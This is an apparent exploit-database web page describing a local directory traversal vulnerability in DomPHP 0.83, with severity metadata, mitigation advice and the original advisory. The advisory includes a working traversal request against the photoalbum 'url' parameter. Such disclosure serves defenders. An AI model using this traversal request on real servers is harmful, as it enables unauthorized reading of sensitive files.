Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
DomPHP - exploit.company
header-logo
Suggest Exploit
vendor:
DomPHP
by:
Houssamix
5.5
CVSS
MEDIUM
Local Directory Traversal
22
CWE
Product Name: DomPHP
Affected Version From: 0.83
Affected Version To: 0.83
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

DomPHP <= v0.83 Local Directory Traversal Vulnerability

The DomPHP script version 0.83 is vulnerable to a local directory traversal attack. An attacker can exploit this vulnerability by providing a crafted URL to the 'url' parameter in the 'index.php' script of the photoalbum module. By manipulating the 'url' parameter, an attacker can navigate to arbitrary directories on the server and access sensitive files.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of DomPHP (v0.84) or later. Additionally, it is recommended to implement access controls and input validation to prevent directory traversal attacks.
Source

Exploit-DB raw data:

-------------------------------------------------------------
DomPHP <= v0.83 Local Directory Traversal Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix                       
= Script : DomPHP <= v0.83
                    
= Download : http://www.domphp.com/download/  
            
= BUG :  Local Directory Traversal Vulnerability 
 
= Exploit :                               
http://[target]/photoalbum/index.php?urlancien=&url=[Directory]
                 
Exemple : 				 
http://target.com/photoalbum/index.php?urlancien=&url=../../

Navigation

Suggest Exploit

Services By CQR